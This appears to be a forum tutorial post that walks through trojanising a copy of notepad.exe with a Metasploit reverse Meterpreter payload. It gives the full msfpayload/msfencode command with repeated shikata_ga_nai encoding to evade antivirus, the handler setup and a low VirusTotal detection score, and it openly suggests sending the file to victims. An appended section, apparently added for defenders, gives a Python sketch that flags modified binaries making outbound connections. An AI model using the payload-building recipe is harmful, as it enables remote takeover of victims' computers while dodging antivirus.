Hi everyone, in my first post I will show you how to create a reverse Meterpreter payload from a "clean" Windows exe file, and then
we will encode it to avoid most AVs. I will use shikata_ga_nai as the encoder, but you can use more than one encoder for a better result,
and you can also remove all the bad chars and generate some NOP shellcode for a more advanced result.
To see all the available encoders you can use the msfencode -l command.
In this tutorial I will use notepad.exe from Windows.
Before we start, here are the options used in the command, for people who don't know what each one does.
-e = the encoder to use
-c = how many times we will encode our payload
-t = output file format
-x = the executable file that we want to encode (used as the template)
-o = the file to save the new executable to
First copy notepad.exe and paste it on your Kali desktop.
Now we open our terminal and use this command:
msfpayload windows/meterpreter/reverse_tcp LHOST=XX.XX.XX.XX LPORT=XXXX R | msfencode -e x86/shikata_ga_nai -c 30 -t exe -x /root/Desktop/notepad.exe -o /root/Desktop/notepad2.exe
and hit enter. Wait until it creates the payload and encodes it 30 times, as we
specified. If everything went right you will see a notepad2.exe file on your desktop; that's our payload. So now we can send our payload
to the victim or upload it for more victims.
You have to use the multi/handler exploit, and don't forget to use the same options as the payload (LPORT etc.).
After uploading it to an online scanner such as VirusTotal, the result was 6/54, good enough for me.
Note: sometimes if you use 2 encoders it may break the payload and you will never get the session.
In the same way you can encode every payload.
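
For defenders: the result described above, a modified copy of notepad.exe that opens an outbound connection, can be caught by checking process-creation events against a baseline of the genuine binary and correlating them with network events. The sketch below is an added example, not part of the original post; the event records are constructed, use simplified Sysmon-style field names, and every hash, path and address in them is a placeholder.

```python
from pathlib import PureWindowsPath

# Assumption: SHA-256 values of the genuine binary, recorded from a clean image.
BASELINE = {"notepad.exe": {"GENUINE-NOTEPAD-SHA256-PLACEHOLDER"}}
TRUSTED_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64"}

# Constructed events (1 = process create, 3 = network connection); all values are placeholders.
EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A}", "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "SHA256": "GENUINE-NOTEPAD-SHA256-PLACEHOLDER"},
    {"EventID": 1, "ProcessGuid": "{B}", "Image": r"C:\Users\demo\Desktop\notepad2.exe",
     "OriginalFileName": "NOTEPAD.EXE", "SHA256": "MODIFIED-COPY-SHA256-PLACEHOLDER"},
    {"EventID": 3, "ProcessGuid": "{B}", "Initiated": "true",
     "DestinationIp": "203.0.113.10", "DestinationPort": 4444},
]


def baseline_violations(ev):
    """Reasons a process-create event fails the baseline; [] if clean or unrelated."""
    path = PureWindowsPath(ev["Image"])
    # Assumption: a modified copy keeps the version resource of the file it was built
    # from, so OriginalFileName still names it; otherwise fall back to the file name.
    claimed = ev.get("OriginalFileName", "").lower()
    name = claimed if claimed in BASELINE else path.name.lower()
    if name not in BASELINE:
        return []
    reasons = []
    if ev["SHA256"] not in BASELINE[name]:
        reasons.append("hash not in baseline")
    if str(path.parent).lower() not in TRUSTED_DIRS:
        reasons.append("runs outside Windows directories")
    if path.name.lower() != name:
        reasons.append("renamed on disk")
    return reasons


def detect(events):
    """Alert when a process that failed the baseline initiates an outbound connection."""
    suspects, alerts = {}, []
    for ev in events:
        if ev["EventID"] == 1:
            reasons = baseline_violations(ev)
            if reasons:
                suspects[ev["ProcessGuid"]] = (ev["Image"], reasons)
        elif ev["EventID"] == 3 and ev.get("Initiated") == "true" and ev["ProcessGuid"] in suspects:
            image, reasons = suspects[ev["ProcessGuid"]]
            alerts.append({"image": image, "reasons": reasons,
                           "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'})
    return alerts
```

The hash check does not depend on antivirus signatures, so a low score on an online scanner does not help a modified copy pass it.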